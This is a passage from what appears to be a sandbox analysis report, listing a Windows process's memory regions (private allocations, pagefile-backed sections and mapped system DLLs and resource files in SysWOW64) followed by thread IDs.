region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 1128 start_va = 0x74120000 end_va = 0x7423efff monitored = 0 entry_point = 0x74165980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1129 start_va = 0x580000 end_va = 0x584fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 1130 start_va = 0x680000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 1131 start_va = 0x6c0000 end_va = 0x6c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 1132 start_va = 0x6d0000 end_va = 0x6d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 1133 start_va = 0x6e0000 end_va = 0x6effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 1134 start_va = 0x700000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1135 start_va = 0x780000 end_va = 0x780fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 1136 start_va = 0x2ae0000 end_va = 0x2bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 1137 start_va = 0x2be0000 end_va = 0x2c9bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002be0000" filename = "" Region: id = 1138 start_va = 0x780000 end_va = 0x783fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 1139 start_va = 0x6f880000 end_va = 0x6f89cfff monitored = 0 entry_point = 0x6f883b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1140 start_va = 0x790000 end_va = 0x793fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1141 start_va = 0x2500000 end_va = 0x2500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002500000" filename = "" Region: id = 1142 start_va = 0x2ca0000 end_va = 0x3191fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ca0000" filename = "" Region: id = 1143 start_va = 0x31a0000 end_va = 0x41dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1144 start_va = 0x2510000 end_va = 0x2514fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 1178 start_va = 0x67130000 end_va = 0x67178fff monitored = 0 entry_point = 0x67136450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 1179 start_va = 0x2520000 end_va = 0x2526fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ole32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\ole32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ole32.dll.mui") Region: id = 1180 start_va = 0x2ca0000 end_va = 0x2d7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Thread: id = 45 os_tid = 0x1110 Thread: id = 46 os_tid = 0x1114 Thread: id = 47 os_tid = 0x1128 Thread: id = 48 os_tid = 0x52c Thread: id = 49 os_tid = 0x114c Thread: id = 50 os_tid = 0x1150 Thread: id = 51 os_tid = 0xad8